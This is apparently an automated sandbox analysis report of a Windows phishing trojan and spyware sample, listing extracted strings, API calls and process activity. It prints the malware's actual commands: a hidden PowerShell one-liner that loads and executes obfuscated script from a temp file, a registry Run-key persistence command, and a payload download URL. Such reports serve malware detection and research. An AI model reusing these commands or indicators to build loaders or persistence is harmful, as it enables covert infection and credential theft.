              Source: bhv9CF8.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv9CF8.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: wab.exe, 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpd
              Source: Evgh. rvs Armenia. 30.04.2024.exe, Evgh. rvs Armenia. 30.04.2024.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: Evgh. rvs Armenia. 30.04.2024.exe, Evgh. rvs Armenia. 30.04.2024.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv9CF8.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000002.00000002.2971208550.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2971208550.0000000004FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.2971208550.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000D.00000002.3049192851.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000D.00000002.3049192851.0000000002FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000007.00000002.3267844230.0000000023630000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.3267844230.0000000023630000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000B.00000002.3089240790.0000000002B34000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000002.00000002.2971208550.0000000004FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
              Source: powershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wab.exe, 00000007.00000002.3256333673.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19support.top/
              Source: wab.exe, 00000007.00000002.3256333673.0000000007A9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19support.top/$5
              Source: wab.exe, 00000007.00000002.3256333673.0000000007A9D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.3267477951.00000000230F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://covid19support.top/OXdwhUAIa249.bin
              Source: wab.exe, 00000007.00000002.3256333673.0000000007A9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19support.top/OXdwhUAIa249.biny
              Source: powershell.exe, 00000002.00000002.2971208550.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: wab.exe, 0000000B.00000002.3089213333.0000000002AFC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
              Source: wab.exe, 0000000B.00000002.3089612257.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=0
              Source: wab.exe, 0000000B.00000002.3089612257.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 0000000B.00000002.3089612257.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=w
              Source: wab.exe, 0000000B.00000002.3089612257.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 0000000B.00000002.3089612257.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
              Source: wab.exe, 0000000B.00000002.3089612257.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
              Source: wab.exe, 0000000B.00000002.3089612257.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=0000
              Source: wab.exe, 0000000B.00000002.3089612257.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3089953411.0000000003469000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.3081516854.0000000003469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 172.67.220.6:443 -> 192.168.2.5:49712 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_00405054 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405054
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3424, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

              System Summary

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten\Evgh. rvs Armenia. 30.04.2024.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0503F94B Sleep,NtProtectVirtualMemory,7_2_0503F94B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeFile created: C:\Windows\resources\0809\Daresay112Jump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeFile created: C:\Windows\resources\0809\Daresay112\SarcomaJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_004063440_2_00406344
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_004048930_2_00404893
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049EEFF82_2_049EEFF8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049EF8C82_2_049EF8C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049EECB02_2_049EECB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0793BB582_2_0793BB58
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_2366B5C17_2_2366B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_236771947_2_23677194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B04011_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043610D11_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044731011_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A49011_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040755A11_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043C56011_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B61011_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044D6C011_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004476F011_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B87011_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044081D11_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041495711_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004079EE11_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407AEB11_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044AA8011_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00412AA911_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404B7411_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404B0311_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044BBD811_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404BE511_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404C7611_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00415CFE11_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416D7211_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00446D3011_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00446D8B11_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406E8F11_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040503812_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041208C12_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004050A912_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040511A12_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043C13A12_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004051AB12_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044930012_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040D32212_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A4F012_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043A5AB12_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041363112_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044669012_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A73012_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004398D812_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004498E012_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A88612_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043DA0912_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00438D5E12_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00449ED012_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041FE8312_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00430F5412_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004050C213_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004014AB13_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040513313_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004051A413_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040124613_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040CA4613_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040523513_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004032C813_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040168913_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00402F6013_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: Evgh. rvs Armenia. 30.04.2024.exe, 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebystaterne fordes.exeZ vs Evgh. rvs Armenia. 30.04.2024.exe
              Source: Evgh. rvs Armenia. 30.04.2024.exeBinary or memory string: OriginalFilenamebystaterne fordes.exeZ vs Evgh. rvs Armenia. 30.04.2024.exe
              Source: Evgh. rvs Armenia. 30.04.2024.exe.2.drBinary or memory string: OriginalFilenamebystaterne fordes.exeZ vs Evgh. rvs Armenia. 30.04.2024.exe
              Source: Evgh. rvs Armenia. 30.04.2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@19/14@4/4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,11_2_004182CE
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,13_2_00410DE1
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_00404320 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404320
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,11_2_00413D4C
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,11_2_0040B58D
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeFile created: C:\Users\user\Documents\Illoyalitet.iniJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\alpwovnb-G3F5OR
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeFile created: C:\Users\user\AppData\Local\Temp\nscFA16.tmpJump to behavior
              Source: Evgh. rvs Armenia. 30.04.2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, wab.exe, 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.3268081079.0000000023EB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 0000000B.00000002.3089778877.0000000003327000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Evgh. rvs Armenia. 30.04.2024.exeReversingLabs: Detection: 31%
              Source: Evgh. rvs Armenia. 30.04.2024.exeVirustotal: Detection: 54%
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeFile read: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_12-33249
              Source: unknownProcess created: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
